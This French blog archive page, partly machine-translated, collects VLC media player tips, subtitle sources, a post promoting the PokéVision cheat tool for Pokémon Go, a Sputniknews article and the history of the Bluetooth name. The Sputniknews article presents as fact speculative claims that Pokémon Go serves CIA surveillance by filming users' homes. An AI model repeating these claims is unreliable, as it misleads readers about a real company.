Étape 4: Redémarrage VLC & Jouer la vidéo:Maintenant, fermez complètement le VLC afin que les changements prennent effet. Maintenant, il suffit d'ouvrir toute vidéo dans VLC et vous verrez votre jeu de puzzle interactif.
Pour plus regarder cette vidéo.15. Jouer la vidéo En caractères ASCII
Pour un peu de plaisir, VLC vous permet d'afficher une vidéo tout en caractères ASCII.

    
Pour activer cette fonction amusante, allez dans Outils> Préférences et cliquez sur la vidéo.
    
Sous la zone de liste déroulante Sortie, choisissez la sortie de l'art vidéo couleur ASCII.
    
Votre vidéo sera désormais affiché entièrement en ASCII. Maintenant, essayez de regarder «The Matrix» comme celui-ci.
Play Video En caractères ASCII
Play Video En caractères ASCII16. Contrôle VLC depuis Android Phone
Contrôle VLC sur Android mobile
Transformez votre mobile en télécommande VLC et les films de contrôle en cours d'exécution depuis votre mobile Android. Si vous regardez des films avec votre famille et les amis, c'est donc le meilleur truc pour les scènes saut adultes dans les films sans toucher votre PC.
Télécharger l'application Remote unifiée dans votre téléphone Android pour contrôler VLC Media du téléphone.TéléchargerQR CodeUnified à distanceDéveloppeur: Unified IntentionsPrix: Gratuit

    
Unified Capture d'écran Remote ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified
Pour en savoir plus lire ce post.LIRE Comment contrôler à distance VLC Media Player à partir de votre Android17. VLC Inception Trick
Vous vous demandez ce que sa création ici? Eh bien, VLC Media Player peut prendre capture d'écran de votre écran actuel et continuer à prendre des captures d'écran en taille relativement plus petite et de mettre sur son panneau d'affichage qui fournira l'effet de votre création.VLC Inception Trick
VLC Inception Trick
Étapes à suivre pour effectuer cette astuce:

    
Ouvrez VLC Media Player Maintenant,
    
Appuyez sur Ctrl + N "écran: //" Type (sans les guillemets) dans la fenêtre ouverte
    
Cliquez sur Play pour voir cette création astuce VLC.
18. Double ou ralentir la vitesse de lecture
Cette fonction est très utile lorsque vous regardez un fichier multimédia principalement pour le contenu, tels que les podcasts, des livres audio, des conférences enregistrées, etc. Pour commencer, appuyez sur le bouton '+' du clavier pour avancer rapidement par 0,1x pour chaque presse. Pour ralentir, appuyez sur '-' touche du clavier.19. Extensions et Plugins
Tout comme Firefox, vous pouvez étendre la fonctionnalité et l'apparence de votre lecteur VLC. Il existe une variété d'extensions et skins disponibles sur le site VideoLAN. Jetez un oeil et voir ce qui vous plaît. Certaines des extensions vous permettent de récupérer automatiquement les sous-titres, informations sur les acteurs, ainsi que les paroles de chansons, entre autres choses. Skins, d'autre part, vous permettent de modifier l'apparence de votre lecteur multimédia et il y a beaucoup de disponibles qui sont sûrs d'adapter à votre goût.VLC Skins
VLC SkinsVLC Skins
VLC SkinsTélécharger VLC SkinsTélécharger Extensions VLC20.VLC Media Player Raccourcis clavier
VLC a intégré des raccourcis. Il y a des gens qui sont plus habitués à l'aide du clavier que la souris de leur ordinateur de bureau ou ordinateur portable et VLC Media Player a pris cela en considération. Voici les raccourcis clavier dans VLC Media Player.

    
F pour Fullscreen
    
barre d'espace pour jouer ou Pause
    
+ De jouer le multimédia plus rapide.
    
S pour Stop.
    
Ctrl + Q pour quitter.
    
Ctrl + touche fléchée pour rendre le volume plus élevé.
    
Ctrl + Bas touche flèche pour baisser le volume.
    
m pour couper le fichier multimédia.
    
Maj + touche flèche droite pour sauter vers l'avant.
    
Maj + Flèche gauche pour sauter vers l'arrière.
    
Ctrl + T et entrez le temps que vous voulez que la vidéo à sauter dans.
J'espère que ces 10 VLC media player astuces vous aideront à en apprendre davantage sur VLC media player.Top 20 Meilleurs VLC Media Player astuces cachées que vous ne connaissez pas
Source.:

VLC: Télécharger sous-titres pour vos films de deux façons




1. Télécharger Sublight pour Windows PC
Sublight est l'un des meilleurs moyens pour le meilleur trouver et télécharger des films sous-titres. Dans le logiciel Sublight il vous suffit de glisser-déposer vos films dans ce logiciel.
Sublight trouver automatiquement des sous-titres appropriés pour votre film. Cliquez sur le bouton de téléchargement et votre sous-titre est prêt à jouer.
Télécharger Sublight
télécharger des sous-titres pour les films de Sublight


2. Trouver manuellement des sous-titres pour vos films
Pour trouver des sous-titres pour votre film, vous pouvez utiliser les sites Web de sous-titres. Mais ceci est un travail manuel. Ci-dessous j'écris quelques sites majeurs pour trouver et télécharger des sous-titres.
http://subscene.com/
http://www.opensubtitles.org/
http://www.podnapisi.net/



Source.:

jeudi 8 septembre 2016

PokéVision, l’application qui rend Pokémon Go presque trop facile

Marre de louper les Pokémon les plus communs ? Envie de muscler votre jeu dans Pokémon Go ? Ne cherchez plus, vous êtes au bon endroit. Enfin, pas tout à fait, mais sachez que seules quelques secondes vous séparent de ce service révolutionnaire qui devrait grandement vous faciliter la tâche !
Le service en question, PokéVision, concrétise très certainement le rêve de n’importe quel joueur de Pokémon Go, quitte peut-être même à être qualifié d’outil de triche. Il faut dire que ce dernier vous mâche le travail : accessible au bout de ce lien, il va, après vous avoir géolocaliser, se charger de scanner la zone où vous vous trouver pour vous lister en temps réel les Pokémon se trouvant à proximité, et pour combien de temps. De quoi éviter d’enchaîner les kilomètres pour collecter des Rattatas et Roucools – même si ces derniers sont sacrément utiles pour grimper de niveau sans trop se compliquer la vie -.
Et puisque PokéVision est fiable à 100% – ses données sont directement reprises des serveurs de Niantic, le développeur de Pokémon Go -, vous n’avez plus aucune raison de ne pas mettre le site dans vos favoris. Et de (re)partir à la chasse ?
Dommage, le temps de quelques heures, on a également pu découvrir une application Android baptisée PokeNotify qui vous envoyait une notification dès qu’un Pokémon était près de vous. Mais puisqu’elle violait les conditions d’utilisation du jeu, elle n’a évidemment pas tardé… à disparaître tel un Pokémon vicieux. Triste.


Source.:

Ne jouez pas à Pokémon-Go




Voici quelques faits curieux sur le jeu Pokémon Go — et ce ne sont pas des ruses afin d’augmenter son niveau de jeu mais des détails sur le fonctionnement du projet. Détails qui peut-être réduiront à néant votre envie de vous lancer à la poursuite des Pokémon, ou de jouer en général.
Le projet Pokémon Go a été créé conjointement par The Pokémon Company, Nintendo et Niantic, ancienne filiale de Google. Niantic a été fondé par John Hanke, également fondateur de la compagnie Keyhole, Inc. spécialisée dans la création de cartes géospatiales. La compagnie a été financée par In-Q-Tel, un fonds américain de capital-investissement mis en place par la CIA en 1999.
A l’époque, plusieurs tâches ont été accomplies:
— la cartographie de la planète régulièrement mise à jour, y compris les autoroutes et tous les grands objets de l’infrastructure urbaine en général,
— des robots-véhicules ont mis leurs nez dans tous les coins du monde et ont cartographié des villes entières, des rues…
Un seul problème demeurait: comment pénétrer les maisons des citoyens, les sous-sols, les casernes et ainsi de suite? Et voilà que Niantic lance un jeu génial et viral basé sur le principe de la réalité augmentée. Une fois qu’il l’a installé et qu’il a lui autorisé l’accès à sa caméra, son microphone, son gyroscope, son GPS et tous ses appareils connectés, le smartphone de l’utilisateur se met à vibrer et signale que plusieurs Pokémon se trouvent à proximité.
Que se passe-t-il ensuite? L’application vous félicite pour votre premier succès parce qu’elle sait comment il est important pour le joueur d’être encouragé. Puis, elle requiert que vous filmiez vos premiers Pokémon captés de tous les angles — et obtient donc les photos de votre appartement en détail, y compris les coordonnées et l’angle d’inclinaison du smartphone.
Félicitations! Il semble que vous venez de filmer votre appartement, les services secrets vous seront certainement reconnaissants…
A propos, les règles d’utilisation qu’il faut accepter pour installer le jeu recèlent d’informations intéressantes. Ainsi, Niantic vous informe en ces termes officiels:
« Nous coopérons avec le gouvernement, les autorités compétentes ou des parties privées pour appliquer et respecter la loi. Nous pouvons divulguer toute information vous concernant (ou votre enfant autorisé) en notre possession ou sous notre contrôle au gouvernement, aux autorités compétentes ou aux parties privées dans le cas où, à notre seule discrétion, nous le penserions nécessaire ou approprié ».
Les développeurs précisent à quelles fins ils peuvent le faire: « (a) pour répondre aux réclamations et à toute procédure juridique (y compris des citations à comparaître); (b) pour protéger notre propriété, nos droits et notre sécurité et la propriété, les droits, et la sécurité d’un tiers ou du public en général; et (c) pour identifier et arrêter toute activité que nous considérerions illégale, contraire à l’éthique, ou passible d’actions en justice ».
Mais qui lit les règles de l’utilisation? On appuie sur « J’accepte » et on se dépêche de lancer le jeu.
Pourtant, les règles s’avèrent être une lecture bien excitante. Elles signalent par exemple que les servers de Pokémon Go enregistrent automatiquement certaines informations sur la façon dont une personne utilise ses services et s’en sert pour administrer ces services et analyser (petit détail: ils peuvent recourir à des tiers pour effectuer cette analyse).
Et cerise sur le gâteau:
« Les informations que nous collectons auprès de nos utilisateurs, y compris les données à caractère personnel, sont considérées comme un actif de l’entreprise ».
Voilà ce que vous acceptez en effet en installant l’appli.
« Si nous étions rachetés par un tiers à la suite d’une transaction telle qu’une fusion, une acquisition ou une vente d’entreprise, ou si nos actifs étaient rachetés par un tiers pour cause de faillite ou de cessation de commerce, une partie ou la totalité de nos actifs, y compris vos données à caractère personnel (ou celles de votre enfant autorisé), pourraient être divulguées ou transférées à un tiers acquéreur dans le cadre de la transaction », poursuivent les règles.
Imaginez-vous cela: le renseignement veut savoir ce qui se passe actuellement, par exemple… au Palais de l’Elysée. Et une minute plus tard les députés, les journalistes, les employés qui s’y trouvent sont tous rivés sur leurs portables qui leur signalent qu’un certain nombre de Pokémon sont dans la place…
Vous connaissez la suite.


Source.: Sputniknews

Pourquoi Bluetooth est appelé Bluetooth?


Bluetooth est nommé après le 10ème siècle d'un Roi scandinave ,il faut connaître l'histoire derrière ça.
L'introduction de la technologie Bluetooth est venu comme une révolution, qui a non seulement amélioré l'utilité des téléphones mobiles, mais également le partage de fichiers un jeu d'enfant. Il a donné un nouveau sens au monde de la communication sans fil. Mais avez-vous déjà réfléchi à la façon dont Bluetooth a obtenu son nom en premier lieu? Avez-vous déjà demandé où les origines du terme «Bluetooth» viennent?
Cependant, il y a une histoire très intéressante derrière tout cela.
En 1996, un certain nombre de sociétés - Intel, Ericsson, Nokia, et plus tard IBM - étaient à la recherche de normaliser l'industrie autour d'une liaison radio à courte portée pour faire un certain nombre de choses. Chaque entreprise avait développé leurs propres technologies radio à courte portée, mais tous les noms ils sont venus avec . C'est alors un roi Scandanavian obscure venu du Moyen Age,les inspira.
Le roi Harald Gormsson est célèbre pour son pouvoir au Danemark et la Norvège entre environ 940 et environ 986. Le roi Harald était aussi célèbre pour l'achèvement des travaux de son père d'unifier les diverses tribus danoises en un seul royaume danois autour 970. Même si, il était seulement en mesure de maintenir cette unification pendant quelques années.
Comme beaucoup de dirigeants médiévaux, il avait aussi un surnom: Blatonn en vieux norrois (un membre de la famille des langues germaniques) ou Blatand en danois. Cela signifie que le Bluetooth. L'origine exacte du surnom est en débat, mais de nombreux chercheurs croient que le roi Harald a été appelé Bluetooth parce qu'il avait une dent morte remarquable qui exactement avait l'air noir et bleu. Il est logique.
Pourquoi est-Bluetooth appelé Bluetooth?
Alors, qu'est-ce qu'un tour-du-dernièr-millénaire du roi Viking ont à voir avec la communication sans fil? Il était un unificateur !
Au milieu des années 1990, le domaine de la communication sans fil avait besoin d'unification. De nombreuses sociétés se développaient normes concurrentes, non-compatibles. Plusieurs personnes ont vu cette division croissante comme une faiblesse à l'adoption généralisée du sans fil.
C'est alors ingénieur Intel Jim Kardach a pris le rôle d'un médiateur inter-entreprise consacrée à l'obtention de diverses entreprises ensemble pour élaborer une norme pour de faible puissance, la connectivité radio à courte portée dans toute l'industrie. Il a également été pris en charge par l'ingénieur Ericsson Sven Mattisson.
Tout en ayant une conversation sur l'histoire, Mattisson dit Kardach qu'il venait de lire un livre intitulé Les Longships par Frans G. Bengtsson qui a compilé les voyages de guerriers danois sous le règne du roi Harald "Bluetooth" Gormsson. Plus tard, Kardach lire Les Vikings par Gwyn Jones qui a comporté le règne de Harald, qu'il considéré comme un symbole idéal pour réunir les parties concurrentes ensemble, comme il l'a expliqué:
"Bluetooth a été emprunté au 10e siècle, le deuxième roi du Danemark, le roi Harald Bluetooth; qui était célèbre pour unir la Scandinavie tout comme nous avions l'intention d'unir le PC et les industries cellulaires avec une liaison sans fil à courte portée ".
"Harald avait uni le Danemark et christianisé les Danois!" A écrit Kardach dans une colonne d'une décennie plus tard. "Il est venu à moi que cela ferait un bon nom de code pour le programme."
Toutes les différentes parties intéressées enfin se sont réunis pour former le Bluetooth Special Interest Group, qui a développé le convenu standard que nous connaissons et aimons aujourd'hui. «Bluetooth» a été initialement conçu pour être juste un nom de code pour la technologie. Il a finalement fini par coller bien et est devenu le nom officiel de la norme.
Pourquoi est-Bluetooth appelé Bluetooth?







L'histoire millénaire  ne se termine pas là. Le logo Bluetooth découle également de "Harald Blatand", avec les longues branches nordiques pour runes "H" et "B" comprenant la conception que vous voyez dans l'ovale bleu du logo. Le logo Bluetooth désormais emblématique est en fait une combinaison-officiellement connu comme une liaison rune des initiales du Roi Bluetooth en runes scandinaves: ᚼ et ᛒ. Lorsque vous rejoignez les deux pour faire une rune de liaison et déposez-le sur un fond bleu, vous obtenez le logo Bluetooth .
Alors, voici comment, nous avons obtenu ce nom et le symbole! Intéressant, non?


Source.: